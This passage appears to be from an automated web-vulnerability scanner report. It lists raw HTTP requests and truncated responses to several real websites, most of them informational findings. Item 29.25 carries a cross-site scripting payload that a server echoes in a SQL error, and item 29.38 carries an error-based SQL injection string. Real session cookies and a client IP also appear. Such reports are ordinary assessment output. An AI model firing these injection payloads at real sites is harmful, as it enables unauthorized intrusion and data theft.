Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1301171826089-Repeat%7C1364243826089%3B%20s_nrgvo%3DRepeat%7C1364243826098%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:20 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m
Last-Modified: Thu, 13 Nov 2008 19:29:35 GMT
Accept-Ranges: bytes
ntCoent-Length: 1193
Cache-Control: max-age=86400
Expires: Sun, 27 Mar 2011 20:36:20 GMT
Edge-Control: downstream-ttl=86400
Content-Type: text/html
Content-Length: 1193

<html>
<head>
<script type='text/javascript'>
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
document.domain=dom
}

function adsPageOnL(){
var adFr=window.frameElement
if (ad
...[SNIP]...
29.21. http://music.aol.com/proxy/promo/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.aol.com
Path:   /proxy/promo/

Request

GET /proxy/promo/ HTTP/1.1
Host: music.aol.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
content-type: text/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; s_pers=%20s_getnr%3D1301171830966-Repeat%7C1364243830966%3B%20s_nrgvo%3DRepeat%7C1364243830970%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcommem%252Caolsvc%253D%252526pid%25253Dacm%25252520%2525253A%25252520main5%25252520AOL.com%252525205.0%25252520Main%252526pidt%25253D1%252526oid%25253Daol-jumpbar1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:26 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Cteonnt-Length: 7725
Content-Type: text/html
Content-Length: 7725


<script type="text/javascript">

function cpOmniClk(omniProp21,omniProp22,omniLnkName,omnObj){
var ex;
try{

var oAcct=s_account;
s_265=s_gi('aolxpro
...[SNIP]...
29.22. http://my-happyfeet.com/images/about2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /images/about2.gif

Request

GET /images/about2.gif HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

Response

HTTP/1.1 404 Not Found
Content-Length: 1070
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:43:56 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#109;&#121;&#45;&#104;&#97
...[SNIP]...
29.23. http://my-happyfeet.com/images/faq2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /images/faq2.gif

Request

GET /images/faq2.gif HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

Response

HTTP/1.1 404 Not Found
Content-Length: 1070
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:43:58 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#109;&#121;&#45;&#104;&#97
...[SNIP]...
29.24. http://my-happyfeet.com/undefined  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /undefined

Request

GET /undefined HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/Commercial2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

Response

HTTP/1.1 404 Not Found
Content-Length: 1070
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:44:35 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#109;&#121;&#45;&#104;&#97
...[SNIP]...
29.25. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:11 GMT
Expires: Thu, 31 Mar 2011 00:53:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQARDDCAB=DFKLDCFBODGPMEKIJBAHJEDF; path=/
X-Powered-By: ASP.NET
Content-Length: 738
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152,
...[SNIP]...
29.26. http://www.aamraresources.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aamraresources.com
Path:   /

Request

GET / HTTP/1.1
Host: www.aamraresources.com
Proxy-Connection: keep-alive
Referer: http://texasgroup.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 00:51:51 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10 with Suhosin-Patch mod_ssl/2.8.31 OpenSSL/0.9.8e
Last-Modified: Thu, 25 Mar 2010 03:59:53 GMT
ETag: "23c2198-3200-4baadfb9"
Accept-Ranges: bytes
Content-Length: 12800
Content-Type: text/html

<html>


<head>

<title>::::Welcome ::::</title>


<STYLE>


A:link {

   FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Verdana; FONT-WEIGHT: none; TEXT-DECORATION: none

}

A:active {

   FONT-SIZE:
...[SNIP]...
29.27. http://www.bluestarfibres.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluestarfibres.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.bluestarfibres.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:13:48 GMT
Server: Apache
Last-Modified: Wed, 24 Nov 2010 10:13:25 GMT
ETag: "28be87-d0-4cece545"
Accept-Ranges: bytes
Content-Length: 208
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.
</body>
...[SNIP]...
29.28. http://www.fast-report.com/bitrix/redirect3.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /bitrix/redirect3.php

Request

GET /bitrix/redirect3.php?GOTO=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3DBITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/bitrix/redirect2.php?event1=avangate_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3D%23EVENT_GID%23
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A45

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:45 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Sat, 26 Mar 2011 16:31:45 GMT
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 330

<html><head><script language="JavaScript1.1" type="text/javascript">function rd(){b_form.submit();}</script></head><body onload="rd();">
<form name="b_form" action="https://secure.avangate.com/order/
...[SNIP]...
29.29. https://www.godaddy.com/sso/keepalive.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /sso/keepalive.aspx

Request

GET /sso/keepalive.aspx?rand=73135 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
Referer: https://www.godaddy.com/gdshop/hosting/landing.asp?isc=GPASH006&se=%2B&ci=415
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; GoogleADServicesgoogleadwordssearch=cjiapcjcgapjuircrfujthnakaycbjcd; BlueLithium_domainsearch=cjiapcjcgapjuircrfujthnakaycbjcd; serverVersion=A; traffic=server=M1PWCORPWEB123&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=&shopper=42533607&querystring=isc%3DGPASH006%26se%3D%252B%26ci%3D415&isc=GPASH006&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1&split=68; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:37 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
29.30. http://www.manitu.de/webhosting/header/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /webhosting/header/

Request

GET /webhosting/header/ HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/webhosting/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:23:34 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
Last-Modified: Tue, 01 Mar 2011 11:36:54 GMT
ETag: "d816a-365-4d6cda56"
Accept-Ranges: bytes
Content-Length: 869
Content-Type: text/html

<html>
   <head>
   </head>
   <body bgcolor="#003fd2">
       <table border="0" cellpadding="0" cellspacing="0" width="100%" height="100%" align="left">
           <tr>
               <td colspan="2" height="1" bgcolor="#b9
...[SNIP]...
29.31. http://www.manitu.de/webhosting/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /webhosting/home/

Request

GET /webhosting/home/ HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/webhosting/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:23:34 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 19127

<html>
   <head>
       <link rel="stylesheet" type="text/css" href="../shared/css/view.css">
   </head>

   <script language="javascript">
       
       function doRedirect(url) {
           
           this.location = url;
   
...[SNIP]...
29.32. http://www.manitu.de/webhosting/nav/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /webhosting/nav/

Request

GET /webhosting/nav/ HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/webhosting/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:23:34 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
Last-Modified: Thu, 11 Nov 2010 05:53:35 GMT
ETag: "d8187-312-4cdb84df"
Accept-Ranges: bytes
Content-Length: 786
Content-Type: text/html

<html>
   <head>
       <link rel="stylesheet" type="text/css" href="../shared/css/view.css">
   </head>
   <body bgcolor="#5183f8">
       <table border="0" cellpadding="0" cellspacing="0" width="100%" height="
...[SNIP]...
29.33. http://www.manitu.de/webhosting/status/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /webhosting/status/

Request

GET /webhosting/status/ HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/webhosting/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:23:34 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
Last-Modified: Thu, 11 Nov 2010 05:53:37 GMT
ETag: "d81ca-482-4cdb84e1"
Accept-Ranges: bytes
Content-Length: 1154
Content-Type: text/html

<html>
   <head>
       <link rel="stylesheet" type="text/css" href="../shared/css/view.css">
   </head>
   <body bgcolor="#eaeaea">
       <table border="0" cellpadding="0" cellspacing="0" width="1024" height="
...[SNIP]...
29.34. http://www.manitu.de/webhosting/subnav/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manitu.de
Path:   /webhosting/subnav/

Request

GET /webhosting/subnav/ HTTP/1.1
Host: www.manitu.de
Proxy-Connection: keep-alive
Referer: http://www.manitu.de/webhosting/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 11:23:34 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
Last-Modified: Thu, 11 Nov 2010 05:53:37 GMT
ETag: "d81cd-591-4cdb84e1"
Accept-Ranges: bytes
Content-Length: 1425
Content-Type: text/html

<html>
   <head>
       <link rel="stylesheet" type="text/css" href="../shared/css/view.css">
   </head>
   <body bgcolor="#b9d7ff">
       <table border="0" cellpadding="0" cellspacing="0" width="100%" height="
...[SNIP]...
29.35. http://www.my-happyfeet.com/images/about2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /images/about2.gif

Request

GET /images/about2.gif HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://www.my-happyfeet.com/cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 404 Not Found
Content-Length: 1070
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 30 Mar 2011 12:09:26 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#109;&#121;&#45;&#104;&#97
...[SNIP]...
29.36. http://www.my-happyfeet.com/images/faq2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /images/faq2.gif

Request

GET /images/faq2.gif HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://www.my-happyfeet.com/cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 404 Not Found
Content-Length: 1070
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 30 Mar 2011 12:09:26 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#109;&#121;&#45;&#104;&#97
...[SNIP]...
29.37. http://www.nutter.com/careers.ph  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /careers.ph

Request

GET /careers.ph HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:19:47 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
Last-Modified: Wed, 07 Sep 2005 22:36:57 GMT
ETag: "323cf9f-17c0-431f6b89"
Accept-Ranges: bytes
Content-Length: 6080
Content-Type: text/html

<!-- home start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
29.38. http://www.nutter.com/careers.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /careers.php

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:08:32 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 15724

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
29.39. http://www.nutter.com/media/swf/media/industries/media.212.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /media/swf/media/industries/media.212.jpg

Request

GET /media/swf/media/industries/media.212.jpg HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/media/swf/interior.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 25 Mar 2011 19:09:33 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
Last-Modified: Wed, 07 Sep 2005 22:36:57 GMT
ETag: "323cf9f-17c0-431f6b89"
Accept-Ranges: bytes
Content-Length: 6080
Content-Type: text/html

<!-- home start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
29.40. http://www.pandasecurity.com/virus_info/exports/fecha_hora.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pandasecurity.com
Path:   /virus_info/exports/fecha_hora.asp

Request

GET /virus_info/exports/fecha_hora.asp HTTP/1.1
Host: www.pandasecurity.com
Proxy-Connection: keep-alive
